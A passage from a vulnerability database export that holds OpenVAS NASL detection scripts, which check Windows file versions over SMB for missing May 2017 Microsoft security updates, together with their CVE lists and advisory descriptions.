exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8:1, win8x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nif(!asVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\srv.sys\")){\n exit(0);\n}\n\nif(version_is_less(version:asVer, test_version:\"6.2.9200.22137\"))\n{\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + asVer + '\\n' +\n 'Vulnerable range: ' + 'Less than 6.2.9200.22137' + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:22:44", "description": "This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019214", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Monthly Rollup (KB4019214)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0269", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0245", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0213", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811112", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811112", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Monthly Rollup (KB4019214)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811112\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0190\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0220\", \"CVE-2017-0222\",\n \"CVE-2017-0226\", \"CVE-2017-0238\", \"CVE-2017-0245\", \"CVE-2017-0246\",\n \"CVE-2017-0258\", \"CVE-2017-0263\", \"CVE-2017-0267\", \"CVE-2017-0268\",\n \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\", \"CVE-2017-0272\",\n \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\", \"CVE-2017-0276\",\n \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98114, 98115, 98112, 98111, 98097, 98274, 98273, 98298, 98271,\n 98270, 98272, 98259, 98258, 98237, 98108, 98121, 98127, 98103,\n 98102, 98260, 98261, 98263, 98264, 98265, 98266, 98267, 98268,\n 98139);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 11:57:51 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Monthly Rollup (KB4019214)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019214\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This security update includes quality\n and security improvements in Microsoft Graphics Component, Windows COM,\n Windows Server, Windows Kernel and Microsoft Windows DNS\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code or elevate user privileges, take control of the affected system,\n and access information from one domain and inject it into another domain, bypass\n security restrictions, conduct denial-of-service condition and gain access to\n potentially sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019214\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.2.9200.22141\"))\n{\n report = 'File checked: ' + sysPath + \"\\Ole32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22141\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:29:30", "description": "This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019215.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Monthly Rollup (KB4019215)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0269", "CVE-2017-0259", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0213", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811113", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811113", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Monthly Rollup (KB4019215)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811113\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0190\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0226\",\n \"CVE-2017-0228\", \"CVE-2017-0231\", \"CVE-2017-0238\", \"CVE-2017-0246\",\n \"CVE-2017-0258\", \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0267\",\n \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\",\n \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\",\n \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\",\n \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98097, 98298, 98102, 98103, 98127, 98139, 98164,\n 98173, 98237, 98108, 98112, 98113, 98258, 98259, 98261, 98263,\n 98264, 98265, 98260, 98274, 98266, 98267, 98268, 98270, 98271,\n 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:07:03 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Monthly Rollup (KB4019215)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update (monthly rollup) according to microsoft KB4019215.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This monthly rollup,\n\n - Addressed issue where applications that use msado15.dll stop working after\n installing security update 4015550.\n\n - Deprecated SHA-1 Microsoft Edge and Internet Explorer 11 for SSL/TLS Server\n Authentication.\n\n - Updated Internet Explorer 11's New Tab Page with an integrated newsfeed.\n\n - Includes security updates to Microsoft Graphics Component, Microsoft Windows\n DNS, Windows COM, Windows Server, Windows kernel, and Internet Explorer.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code or elevate user privileges, take control of the affected system,\n bypass security restrictions, conduct denial-of-service condition, gain access\n to potentially sensitive information and spoof content by tricking a user by\n redirecting the user to a specially crafted website.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64 systems\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019215\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.3.9600.18666\"))\n{\n report = 'File checked: ' + sysPath + \"\\System32\\Ole32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: Less than 6.3.9600.18666\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:25:18", "description": "This host is missing important/critical\n security update according to Microsoft Security update KB4019474.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019474)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811111", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811111", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019474)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811111\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0190\", \"CVE-2017-0212\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0226\",\n \"CVE-2017-0227\", \"CVE-2017-0228\", \"CVE-2017-0229\", \"CVE-2017-0231\",\n \"CVE-2017-0233\", \"CVE-2017-0234\", \"CVE-2017-0236\", \"CVE-2017-0238\",\n \"CVE-2017-0240\", \"CVE-2017-0241\", \"CVE-2017-0246\", \"CVE-2017-0248\",\n \"CVE-2017-0258\", \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0267\",\n \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\",\n \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\",\n \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\",\n \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98298, 98099, 98102, 98103, 98127, 98139, 98281,\n 98164, 98217, 98173, 98179, 98229, 98234, 98237, 98203, 98208,\n 98108, 98117, 98112, 98113, 98258, 98259, 98261, 98263, 98264,\n 98265, 98260, 98274, 98266, 98267, 98268, 98270, 98271, 98272,\n 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:55:53 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019474)\");\n\n script_tag(name:\"summary\", value:\"This host is missing important/critical\n security update according to Microsoft Security update KB4019474.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, spoof content, bypass\n certain security restrictions and cause a host machine to crash.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4019474\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_is_less(version:edgeVer, test_version:\"11.0.10240.17394\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: Less than 11.0.10240.17394\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:25:38", "description": "This host is missing a critical/important\n security update according to Microsoft KB4019473.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019473)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811110", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811110", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019473)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811110\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0190\", \"CVE-2017-0212\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0226\",\n \"CVE-2017-0227\", \"CVE-2017-0228\", \"CVE-2017-0229\", \"CVE-2017-0231\",\n \"CVE-2017-0233\", \"CVE-2017-0234\", \"CVE-2017-0236\", \"CVE-2017-0238\",\n \"CVE-2017-0240\", \"CVE-2017-0241\", \"CVE-2017-0246\", \"CVE-2017-0248\",\n \"CVE-2017-0258\", \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0266\",\n \"CVE-2017-0267\", \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\",\n \"CVE-2017-0271\", \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\",\n \"CVE-2017-0275\", \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\",\n \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98298, 98099, 98102, 98103, 98127, 98139, 98281,\n 98164, 98217, 98173, 98179, 98229, 98234, 98237, 98203, 98208,\n 98108, 98117, 98112, 98113, 98258, 98276, 98259, 98261, 98263,\n 98264, 98265, 98260, 98274, 98266, 98267, 98268, 98270, 98271,\n 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:55:53 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019473)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical/important\n security update according to Microsoft KB4019473.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, spoof content, bypass\n certain security restrictions and cause a host machine to crash.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4019473\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.915\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10586.0 - 11.0.10586.915\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:47:45", "description": "This host is missing an important security\n update according to Microsoft security update KB4019204.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows 'Win32k.sys' Multiple Vulnerabilities (KB4019204)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0263", "CVE-2017-0245", "CVE-2017-8552", "CVE-2017-0246"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811028", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811028", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows 'Win32k.sys' Multiple Vulnerabilities (KB4019204)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811028\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-0245\", \"CVE-2017-0246\", \"CVE-2017-0263\", \"CVE-2017-8552\");\n script_bugtraq_id(98115, 98108);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 10:30:09 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft Windows 'Win32k.sys' Multiple Vulnerabilities (KB4019204)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft security update KB4019204.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error when the win32k component improperly provides kernel information.\n\n - An error when Windows improperly handles objects in memory.\n\n - An error in Windows when the Windows kernel-mode driver fails to properly\n handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode allowing attacker to install programs,\n view, change, or delete data, or create new accounts with full user rights.Also\n an attacker who successfully exploited this vulnerability could run processes\n in an elevated context and can lead to denial of service condition as well.This\n vulnerability also could allow attacker obtain sensitive information to further\n compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP SP2 x64\n\n - Microsoft Windows XP SP3 x86\n\n - Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n - Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 and prior\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019204\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0245\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0246\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, winVista:3,\n win2008:3, winVistax64:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!winVer){\n exit(0);\n}\n\nif(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:winVer, test_version:\"6.0.6002.19778\"))\n {\n Vulnerable_range = \"Less than 6.0.6002.19778\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:winVer, test_version:\"6.0.6002.24000\", test_version2:\"6.0.6002.24094\"))\n {\n Vulnerable_range = \"6.0.6002.24000 - 6.0.6002.24094\";\n VULN = TRUE ;\n }\n\n}\n\nelse if(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:winVer, test_version:\"5.1.2600.7258\"))\n {\n Vulnerable_range = \"Less than 5.1.2600.7258\";\n VULN 